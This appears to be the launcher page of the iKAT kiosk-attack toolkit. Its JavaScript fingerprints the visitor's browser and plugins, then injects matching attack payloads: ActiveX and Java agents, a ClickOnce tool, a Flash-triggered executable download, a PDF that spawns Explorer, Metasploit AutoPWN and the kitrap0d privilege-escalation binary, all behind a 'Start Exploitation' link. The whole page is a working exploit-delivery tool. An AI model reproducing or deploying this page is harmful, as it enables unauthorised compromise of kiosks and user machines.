<html>
<head>
<link rel="stylesheet" type="text/css" media="screen" href="/css/style.css" />

 <script type="text/javascript" src="plugindetect.js"></script>
 
 <script>
	function exploit() {
		var exploits ="";
		
		if(PluginDetect.isIE) {
			document.write("<p>IE based browser detected.</p>");
		}
		
		if(PluginDetect.isGecko) {
			document.write("<p>Browser is based on Gecko. Likly Firefox, Mozilla, Netscape, Flock, SeaMonkey or K-Meleon</p>");
		exploits = exploits + "<p>iKAT Firefox Plugin</p><iframe src=/firefoxaddon></iframe>";
		}

		if(PluginDetect.isSafari) {
			document.write("<p>Safari based browser detected.</p>");
		}
		
		if(PluginDetect.isChrome) {
			document.write("<p><strong>Google Chrome based browser detected.</strong></p>");
		}
				
		if(PluginDetect.isOpera) {
			document.write("<p>Opera based browser detected.</p>");
		}
		
		// activex/.net/java
		if(PluginDetect.ActiveXEnabled) { 
			document.write("<p>ActiveX is enabled.</p>");
			exploits = exploits + "<p>iKAT ActiveX Control</p><OBJECT id=ikat type=application/x-oleobject classid=clsid:FFA0AEB0-25DD-4671-9AC8-127DDC843809 codebase=/Windows/files/ikat.ocx width=90 height=80></object>";
		}
	
	 var Java0Status = PluginDetect.isMinVersion('Java', '0', 'getJavaInfo.jar');
	 var Java0Installed = Java0Status >=0 ? true : false;
	if(Java0Installed) {
			document.write("<p>Java is enabled.</p>");
			exploits = exploits + "<p>iKAT Agent for Java</p> <iframe src=/javaapplet></iframe>";
	}
	
		
	if (navigator.userAgent.indexOf("CLR")!=-1) {
			document.write("<p>ClickOnce is installed.</p>");
exploits = exploits + "<p>iKAT ClickOnce Tool</p><iframe src='/Windows/clickonce/iKAT/iKAT.application'></iframe>";
}
	
		
		var status = PluginDetect.isMinVersion('Flash', '0', '');
       var Flash = (status >=0 ? true : false); 
			if(Flash) {
					document.write("<p>Flash is installed.</p>");
		exploits = exploits + "<p>Download Executor Through Flash</p><iframe height=300 src=/flashdownload?filename=/Windows/files/ikat.exe></iframe>";
		}
		
		
		//file formats..
		
		   var status = PluginDetect.isMinVersion('AdobeReader', '0', 'application/vnd.fdf');
       var AdobeReader = (status >=0 ? true : false); 
			if(AdobeReader) {
					document.write("<p>Acrobat Reader is installed.</p>");
		exploits = exploits + "<p>Spawn Explorer Through Acrobat</p><iframe src=/Windows/files/pdf/adobe_pdf_embedded.pdf></iframe>";
		}
		
		var status = PluginDetect.isMinVersion('WindowsMediaPlayer', '0')
       var WMP = (status >=0 ? true : false); 
			if(WMP) {
					document.write("<p>Windows Media Player is installed.</p>");
		exploits = exploits + "<p>Web Media Embedded Windows Media Play List</p><iframe src='/Windows/files/console.asx'></iframe>";
		}
		
		exploits = exploits + "<p>iKAT Metasploit AutoPWN</p><iframe src='/autopwn'></iframe>";
		exploits = exploits + "<p>kitrap0d local priv-esc</p><iframe src='/Windows/files/kitrap0d.exe'></iframe>";
		document.write(exploits);
	}
		</script>
		</head>
<body style="background: white;">
	<div id="mselect">
<div id="plugindetect"></div>

<p><strong><a href="javascript:exploit()">Start Exploitation</a></strong></p>
<font colour=red>

</body>

</html>
